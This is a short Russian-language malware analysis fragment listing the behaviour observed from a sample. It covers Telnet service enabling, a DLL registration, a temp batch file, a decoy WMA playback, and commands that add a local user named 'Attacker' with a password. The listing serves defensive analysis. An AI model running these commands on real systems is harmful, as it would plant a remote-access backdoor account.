Техническая информация
- [<HKLM>\SYSTEM\ControlSet001\Services\TlntSvr] 'Start' = '00000002'
- '<SYSTEM32>\tlntsvr.exe'
- '<SYSTEM32>\net1.exe' start telnet
- '<SYSTEM32>\regsvr32.exe' /s <SYSTEM32>\tlntsvrp.dll
- '<SYSTEM32>\net1.exe' user /add Attacker Complicated1!
- '<SYSTEM32>\net.exe' user /add Attacker Complicated1!
- '<SYSTEM32>\cacls.exe' "<SYSTEM32>\config\system"
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\1.tmp\2.bat" <Полный путь к файлу>"
- '%ProgramFiles%\Windows Media Player\wmplayer.exe' "<Текущая директория>\03 Santeria.wma"
- '<SYSTEM32>\net.exe' start telnet
- '<SYSTEM32>\sc.exe' config tlntsvr start= auto
- %TEMP%\1.tmp\2.bat
- ClassName: 'WMP9DeskBand' WindowName: 'WMP9DeskBand'
- ClassName: 'ReBarWindow32' WindowName: ''
- ClassName: 'Shell_TrayWnd' WindowName: ''